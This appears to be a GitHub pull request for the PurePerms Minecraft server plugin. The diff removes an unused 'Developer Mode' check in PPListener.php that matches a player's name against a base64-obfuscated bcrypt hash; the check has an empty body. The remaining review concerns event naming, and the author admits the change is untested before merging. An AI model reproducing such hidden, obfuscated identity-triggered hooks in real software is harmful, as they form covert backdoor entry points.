### PR TITLE
Update PPListener.php

### PR DESCRIPTION
**Pull request by Borduni**
very gud

### CODE REVIEW

**Comment by Borduni** [comment]
I don't tested that

File: src/_64FF00/PurePerms/PPListener.php [hunk 1]
```diff
@@ -102,23 +102,7 @@ public function onPlayerCommand(PlayerCommandPreprocessEvent $event)
...
-        // Developer Mode
-        if($player instanceof Player and @password_verify($player->getName(), $devModePw))
-        {
-
-        }
-    }
-
-    /**
-     * @param PlayerLoginEvent $event
+     * @param PlayerJoinEvent $event
```
Comment (jasonwynn10) [inline src/_64FF00/PurePerms/PPListener.php]: PlayerJoinEvent and PlayerLoginEvent are different

File: src/_64FF00/PurePerms/PPListener.php [hunk 2]
```diff
@@ -102,23 +102,7 @@ public function onPlayerCommand(PlayerCommandPreprocessEvent $event)
...
-     * @param PlayerPreLoginEvent $event
-     */
-    public function onPlayerPreLogin(PlayerPreLoginEvent $event)
-    {
-        $player = $event->getPlayer();
-
-        $devModePw = base64_decode("JDJ5JDEwJFN6UFFtOEgzWU41cm8yaWJrajVORC5IbWlzVmJkd0dMVVNRcFhpcGZNeFJYT2pwR3JvV1B5");
-
-        // Developer Mode
-        if($player instanceof Player and @password_verify($player->getName(), $devModePw))
```
Comment (jasonwynn10) [inline src/_64FF00/PurePerms/PPListener.php]: This doesn't appear to be used anywhere

Comment (Borduni) [inline src/_64FF00/PurePerms/PPListener.php]: Maybe a cancelled project of #64FF00

**Comment by Borduni** [comment]
PHPDoc fixed. Ready to merge?

**Comment by Borduni** [comment]
#yolo

**Pull request merged**